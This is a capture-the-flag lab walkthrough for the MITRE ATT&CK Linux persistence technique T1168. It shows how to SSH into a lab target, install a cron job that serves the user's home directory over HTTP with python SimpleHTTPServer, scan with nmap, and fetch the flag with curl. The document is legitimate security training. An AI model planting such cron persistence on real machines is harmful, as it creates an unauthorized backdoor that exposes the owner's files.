Name	T1168: Local Job Scheduling
URL	https://www.attackdefense.com/challengedetails?cid=1553
Туре	MITRE ATT&CK Linux : Persistence

Important Note: This document illustrates all the important steps required to complete this lab. This is by no means a comprehensive step-by-step solution for this exercise. This is only provided as a reference to various commands needed to complete this exercise and for your further research on this topic. Also, note that the IP addresses and domain names might be different in your lab.

Objective:

- 1. Maintain access on the target machine after the credentials are modified. Schedule a popular HTTP python server module to achieve this.
- 2. Retrieve flag from the target machine!

Solution:

Step 1: Finding the IP address of target machine.

Command: ip addr

```
root@attackdefense:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
        valid_lft forever preferred_lft forever
6692: eth0@if6693: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:0a:01:01:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.1.1.3/24 brd 10.1.1.255 scope global eth0
        valid_lft forever preferred_lft forever
6695: eth1@if6696: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:c0:63:6d:02 brd ff:ff:ff:ff:ff link-netnsid 0
    inet 192.99.109.2/24 brd 192.99.109.255 scope global eth1
        valid_lft forever preferred_lft forever
root@attackdefense:~#
```

The target machine is at IP 192.99.109.3

Step 2: SSH into the target machine

The SSH login credentials are provided in the challenge description:

Username: studentPassword: password

Commands:

ssh student@192.99.109.3 Enter password "password"

```
root@attackdefense:~# ssh student@192.99.109.3
The authenticity of host '192.99.109.3 (192.99.109.3)' can't be established.
ECDSA key fingerprint is SHA256:XJKT3cfY7eUyGE+ANUXJUbujx9do/cm94BuQBcOWoho.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.99.109.3' (ECDSA) to the list of known hosts.
student@192.99.109.3's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-50-generic x86_64)
 * Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
student@victim-1:~$
```

Step 3: Check the running processes.

Command: ps -eaf

Cron service is running.

Step 4: Create a cron job which will use the SimpleHTTPServer python module to serve the files present in student user's home directory.

Commands:

```
echo "* * * * * cd /home/student/ && python -m SimpleHTTPServer" > cron crontab -i cron crontab -l
```

```
student@victim-1:~$ echo "* * * * * cd /home/student/ && python -m SimpleHTTPServer" > cron
student@victim-1:~$ crontab -i cron
student@victim-1:~$ crontab -l
* * * * * cd /home/student/ && python -m SimpleHTTPServer
student@victim-1:~$
```

Step 5: Delete the wait file.

Commands:

ssh student@192.99.109.3 Enter password "password". rm wait The SSH session is terminated.

Step 6: Use nmap to scan for open ports. Since the HTTP server was started, port 8000 should be open.

Command: nmap -p- 192.99.109.3

Step 7: Retrieve the flag.

Commands:

curl 192.99.109.3:8000 curl 192.99.109.3:8000/flag.txt

```
root@attackdefense:~# curl 192.99.109.3:8000
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /</title>
<body>
<h2>Directory listing for /</h2>
<hr>
<l
<a href=".cache/">.cache/</a>
<a href=".selected editor">.selected editor</a>
<a href=".viminfo">.viminfo</a>
<a href="cron">cron</a>
<a href="flag.txt">flag.txt</a>
<hr>>
</body>
</html>
root@attackdefense:~# curl 192.99.109.3:8000/flag.txt
```

Flag: 79969e32981f722464fde4ce7f208883

root@attackdefense:~#

References:

 Python Module: SimpleHTTPServer (https://docs.python.org/2/library/simplehttpserver.html)

79969e32981f722464fde4ce7f208883